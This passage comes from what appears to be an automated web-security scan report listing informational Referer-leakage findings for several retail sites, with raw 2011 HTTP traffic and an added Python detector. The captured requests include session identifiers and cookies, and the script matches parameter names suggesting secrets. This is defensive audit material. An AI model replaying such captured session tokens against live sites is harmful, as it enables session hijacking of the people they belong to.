<area shape="rect" coords="6,67,159,120" href="http://www.bhphotovideo.com/bnh/controller/home?O=RootPage.jsp&A=getpage&Q=EventSpace.jsp&cm_sp=Banner-_-HomePage-_-EventSpace" alt="In-store events" />
   <area shape="rect" coords="163,6,319,60" href="http://www.bhinsights.com?cm_sp=Banner-_-HomePage-_-bhinsights" target="_blank" alt="BH Insights" />
   <area shape="rect" coords="6,6,159,61" href="http://www.bhphotovideo.com/find/HelpCenter/NYSuperStore08.jsp?cm_sp=Banner-_-HomePage-_-NYsuperStore" alt="store experience" />
...[SNIP]...
ape="poly" coords="317,118,317,66,163,66,163,99,251,99,251,118" href="http://www.bhphotovideo.com/find/hdslr.jsp?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2`HUB" target="_self" alt="HDSLR-View products" />
   <area shape="rect" coords="162,99,252,120" href="http://hdslr.bhphoto.com/Home.php?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2Guide" onclick="subWindowNoScrollBars('hdslrGuideWin', 654, 991);" target="hdslrGuideWin" alt="HDSLR-Online Guide" />
   <area shape="rect" coords="324,5,478,99" href="https://secure.bhphotovideo.com/bnh/controller/home/?O=LeftNavBar&amp;A=signUp&amp;Q=" target="_self" alt="Email subscription" />
...[SNIP]...
<li><a name="B&amp;H_Insights" href="http://www.bhinsights.com" onclick="return widgets.popup(this, 'profiles.insights');" >B&amp;H Insights Blog</a>
...[SNIP]...
<li><a class="facebook" href="http://www.facebook.com/bhphoto?v=wall" alt="Facebook" target="blank">Facebook</a>
...[SNIP]...
<li><a class="twitter" href="http://twitter.com/bhphotovideo" alt="Twitter" target="blank">Twitter</a>
...[SNIP]...
<li><a class="youTube" href="http://www.youtube.com/user/BHPhotoVideoProAudio" alt="You Tube" target="blank">You Tube</a>
...[SNIP]...
<li class="hackerSafe"><a class="hackerSafeLink" onclick="return widgets.popup(this, 'Mcafee', 'width=560px, scrollbars=yes');" target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.bhphotovideo.com" rel="nofollow">McAfee Secure - Tested Daily</a>
...[SNIP]...
<li class="cyberTrust"><a class="cyberTrustLink" onclick="return widgets.popup(this, 'Cyberrust', 'width=810px, scrollbars=yes');" href="http://secure.globalsign.net/en/find/sealct.cfm?id=49947127" target="_blank" rel="nofollow">Cybertrust - Secured Website</a>
...[SNIP]...
<li class="bbbOnline"><a class="bbbOnlineLink" onclick="return widgets.popup(this, 'BBB', 'width=800px, height=480px, scrollbars=yes');" href="http://www.bbbonline.org/cks.asp?id=121000249" target="_blank" rel="nofollow">BBB - Accredited Business</a>
...[SNIP]...
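
Every entry in this section reports the same condition: the page was requested with a query string (or, as in 17.28, with a session identifier carried as a ;path parameter), and the response references other domains, so a browser that follows those references sends the full page URL to the third party in the Referer header. The script below is an added example written for this edit; it is not part of the XSS.CX report or of the scanner that produced it. It reproduces the condition over a raw request/response pair and additionally separates cross-domain script includes (which execute in the page's origin) from plain links, and flags parameter names that suggest the leaked URL carries something sensitive. The request and response body are constructed samples patterned on entry 17.27, not the captured traffic; `registrable()` is a deliberately crude eTLD+1 approximation, and the `SENSITIVE` name patterns are an assumption about which parameters matter.

```python
import re
from urllib.parse import urlsplit

# Constructed sample, patterned on the 17.27 entry but not the captured page:
# a request whose target carries a query string, and a response body with
# same-site, relative and third-party references.
SAMPLE_REQUEST = (
    "GET /bnh/controller/home?KW=BANNER2&img=bh_wl.gif HTTP/1.1\r\n"
    "Host: www.bhphotovideo.com\r\n"
    "\r\n"
)
SAMPLE_RESPONSE_BODY = """<html><head>
<script src="https://media.gsimedia.net/tg/gsiutt/store133.js"></script>
</head><body>
<a href="http://www.bhphotovideo.com/find/hdslr.jsp">same site</a>
<a href="http://www.bhinsights.com?cm_sp=Banner" target="_blank">BH Insights</a>
<a href="http://www.facebook.com/bhphoto?v=wall">Facebook</a>
<iframe src="https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167"></iframe>
<img src="//images.scanalert.com/meter/www.bhphotovideo.com/31.gif">
<a href="/find/HelpCenter?x=1">relative link, same origin</a>
</body></html>"""

# tag name, URL-bearing attribute, quoted attribute value
URL_ATTR = re.compile(r"""<(\w+)[^>]*?\b(href|src|action)\s*=\s*["']([^"']+)["']""", re.I)
# assumed parameter-name patterns that usually mean the Referer carries a secret
SENSITIVE = re.compile(r"(sess|token|auth|key|secret|passw|email|sid)", re.I)


def parse_request(raw):
    """Return (host, path, query) from a raw HTTP/1.x request head."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    _method, target, _version = lines[0].split(" ", 2)
    host = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host = value.strip().lower()
    parts = urlsplit(target)          # urlsplit keeps ";jsessionid=..." in the path
    return host, parts.path, parts.query


def registrable(host):
    """Crude eTLD+1 (last two labels). Adequate for the .com hosts in this
    report; a real tool should consult the Public Suffix List."""
    labels = host.lower().split(":")[0].split(".")
    return ".".join(labels[-2:])


def cross_domain_refs(body, page_host):
    """Yield (tag, attr, host) for each absolute or protocol-relative URL whose
    registrable domain differs from the page's own."""
    own = registrable(page_host)
    for tag, attr, url in URL_ATTR.findall(body):
        if url.startswith("//"):
            url = "https:" + url       # protocol-relative: still a third-party fetch
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.netloc:
            continue                   # relative URL: same origin, nothing leaks
        if registrable(parts.netloc) != own:
            yield tag.lower(), attr.lower(), parts.netloc.lower()


def sensitive_parts(path, query):
    """Names of query parameters and ';'-delimited path parameters (for
    example ;jsessionid=...) that look like credentials or identifiers."""
    names = [kv.split("=", 1)[0] for kv in query.split("&") if kv]
    names += [seg.split("=", 1)[0] for seg in path.split(";")[1:]]
    return sorted({n for n in names if SENSITIVE.search(n)})


def check_referer_leakage(raw_request, response_body):
    """Reproduce the condition in the issue detail: a query string in the
    loaded URL and links to other domains in the response."""
    host, path, query = parse_request(raw_request)
    refs = sorted(set(cross_domain_refs(response_body, host)))
    return {
        "has_query": bool(query),
        "third_party_hosts": sorted({h for _, _, h in refs}),
        "script_includes": sorted({h for t, a, h in refs if t == "script" and a == "src"}),
        "sensitive_params": sensitive_parts(path, query),
        "leaks": bool(query) and bool(refs),
    }


if __name__ == "__main__":
    for key, value in check_referer_leakage(SAMPLE_REQUEST, SAMPLE_RESPONSE_BODY).items():
        print(f"{key}: {value}")
```

The result is only as interesting as `sensitive_params`: a query string of `KW=BANNER2&img=bh_wl.gif` leaking to a pixel host is the Information-severity case these entries describe, whereas a `;jsessionid=` path parameter (the shape of the 17.28 request) is listed even when `has_query` is false, because the Referer carries the path as well as the query and a session token there is a real exposure.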

17.28. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<div id="social_fb_like">
               <a href="http://www.facebook.com/bluefly" alt="Bluefly on Facebook" title="Bluefly on Facebook"><img src="https://media.bluefly.com/media/templates/images/footer/social_new/fb-icon.png" alt="Bluefly on Facebook" border="0" />
...[SNIP]...
</a>
               <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div id="social_twitter">
               <a href="http://www.twitter.com/bluefly_com" alt="Follow us on Twitter" title="Follow us on Twitter"><img src="https://media.bluefly.com/media/templates/images/footer/social_new/twitter-icon.png" alt="Follow us on Twitter" border="0" />
...[SNIP]...
<li><a href="http://www.facebook.com/Bluefly">bluefly on facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/bluefly_com">bluefly on twitter</a>
...[SNIP]...
</a>, <a href="http://www.blueflyclosetconfessions.com">celebrity closets</a>
...[SNIP]...

17.29. http://www.bluenile.com/build-your-own-diamond-ring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:36:20 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<div class="back-to-search" id="back-to-search" style="display:none;"><a class="ajax-transition back-search-link" href="//byor.jsp?forceStep=DIAMONDS_STEP"><img height="14px" width="14px" src="http://pics.bluenile.com/assets/chrome/but/but_bigBlue_arrow_back.gif">
...[SNIP]...
<!-- Atlas / Microsoft ad tracking -->
   <img height="1" width="1" src="http://view.atdmt.com/action/BlueNile_Build_your_own_ring"/>
<div id="footer-international-placeholder">
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<div id="in-the-news-item-1" class="in-the-news-item" style="display:block;">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_businessweek_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<h3>
...[SNIP]...
<div id="in-the-news-item-2" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_npr_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<h3>
...[SNIP]...
<div id="in-the-news-item-3" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_economist_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<h3>
...[SNIP]...
<div id="in-the-news-item-4" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_kiplingers_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<h3>
...[SNIP]...
<div id="in-the-news-item-5" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_cnbc_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<h3>
...[SNIP]...
<p>
We offer both <a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bmlweb/np90drollingiw.html',600,620,true,true,false);">Bill Me Later&reg;</a>
and <a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bluenileweb/bnpaiw.html',600,620,true,true,false);">Blue Nile&reg; Preferred Financing</a>
...[SNIP]...
<div class="footer_flag_icon">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" align="absmiddle" width="26" height="17">
...[SNIP]...
<div class="flag-column">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" width="26" height="17" />
...[SNIP]...
<li>
<a href="http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html" rel="nofollow"><img width="76" height="44" src="http://img.bluenile.com/is/image/bluenile/coe_logo_horiz_10" alt="Biz Rate 2010">
...[SNIP]...
<li>
<a href="http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE" rel="nofollow"><img width="70" height="36" src="http://img.bluenile.com/is/image/bluenile/logo4" alt="Nasdaq">
...[SNIP]...
<li>
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en" rel="nofollow"><img width="53" height="34" src="http://img.bluenile.com/is/image/bluenile/logo5" alt="Verisign">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bmlweb/np90drollingiw.html',600,620,true,true,false);"><img width="64" height="39" src="http://img.bluenile.com/is/image/bluenile/logo7" alt="Bill Me Later...">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bluenileweb/bnpaiw.html',600,620,true,true,false);"><img width="120" vspace="7" height="40" src="/assets/chrome/bug/bnpreferred_sm_120x40.gif" alt="Blue Nile... Preferred Financing">
...[SNIP]...
<noscript>
<a style="padding: 0px; margin: 0pt auto;" title="Blue Nile Inc, Jewelers - Retail, Seattle, WA" href="http://www.bbb.org/western-washington/business-reviews/jewelers-retail/blue-nile-in-seattle-wa-15026564#bbblogo" class="rbhzbus" id="bbblink" target="_blank"><img width="200" height="38" alt="Blue Nile Inc, Jewelers - Retail, Seattle, WA" src="http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png" id="bbblinkimg" style="padding: 0px; border: medium none;"></a>
...[SNIP]...
<li><a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8">Careers</a>
...[SNIP]...

17.30. http://www.bluenile.com/engagement-rings

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /engagement-rings

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

GET /engagement-rings?track=head HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.1.10.1305541144

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:26 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Vary: Accept-Encoding
Content-Length: 76503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="htt
...[SNIP]...
<!-- Atlas / Microsoft ad tracking -->
<img height="1" width="1" src="http://view.atdmt.com/action/BlueNile_Engagement_ring"/>
<!-- Akamai / acerno ad tracking -->
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<div id="in-the-news-item-1" class="in-the-news-item" style="display:block;">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_businessweek_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<h3>
...[SNIP]...
<div id="in-the-news-item-2" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_npr_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<h3>
...[SNIP]...
<div id="in-the-news-item-3" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_economist_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<h3>
...[SNIP]...
<div id="in-the-news-item-4" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_kiplingers_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<h3>
...[SNIP]...
<div id="in-the-news-item-5" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_cnbc_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<h3>
...[SNIP]...
<p>
We offer both <a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bmlweb/np90drollingiw.html',600,620,true,true,false);">Bill Me Later&reg;</a>
and <a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bluenileweb/bnpaiw.html',600,620,true,true,false);">Blue Nile&reg; Preferred Financing</a>
...[SNIP]...
<div class="footer_flag_icon">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" align="absmiddle" width="26" height="17">
...[SNIP]...
<div class="flag-column">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" width="26" height="17" />
...[SNIP]...
<li>
<a href="http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html" rel="nofollow"><img width="76" height="44" src="http://img.bluenile.com/is/image/bluenile/coe_logo_horiz_10" alt="Biz Rate 2010">
...[SNIP]...
<li>
<a href="http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE" rel="nofollow"><img width="70" height="36" src="http://img.bluenile.com/is/image/bluenile/logo4" alt="Nasdaq">
...[SNIP]...
<li>
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en" rel="nofollow"><img width="53" height="34" src="http://img.bluenile.com/is/image/bluenile/logo5" alt="Verisign">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bmlweb/np90drollingiw.html',600,620,true,true,false);"><img width="64" height="39" src="http://img.bluenile.com/is/image/bluenile/logo7" alt="Bill Me Later...">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bluenileweb/bnpaiw.html',600,620,true,true,false);"><img width="120" vspace="7" height="40" src="/assets/chrome/bug/bnpreferred_sm_120x40.gif" alt="Blue Nile... Preferred Financing">
...[SNIP]...
<noscript>
<a style="padding: 0px; margin: 0pt auto;" title="Blue Nile Inc, Jewelers - Retail, Seattle, WA" href="http://www.bbb.org/western-washington/business-reviews/jewelers-retail/blue-nile-in-seattle-wa-15026564#bbblogo" class="rbhzbus" id="bbblink" target="_blank"><img width="200" height="38" alt="Blue Nile Inc, Jewelers - Retail, Seattle, WA" src="http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png" id="bbblinkimg" style="padding: 0px; border: medium none;"></a>
...[SNIP]...
<li><a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8">Careers</a>
...[SNIP]...

17.31. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /floating-daybed-with-canopy-pool-lounger.html

Issue detail

The page was loaded from a URL containing a query string (see the request line below). The response contains the following links to other domains (see the excerpted response below).

Request

GET /floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241 HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
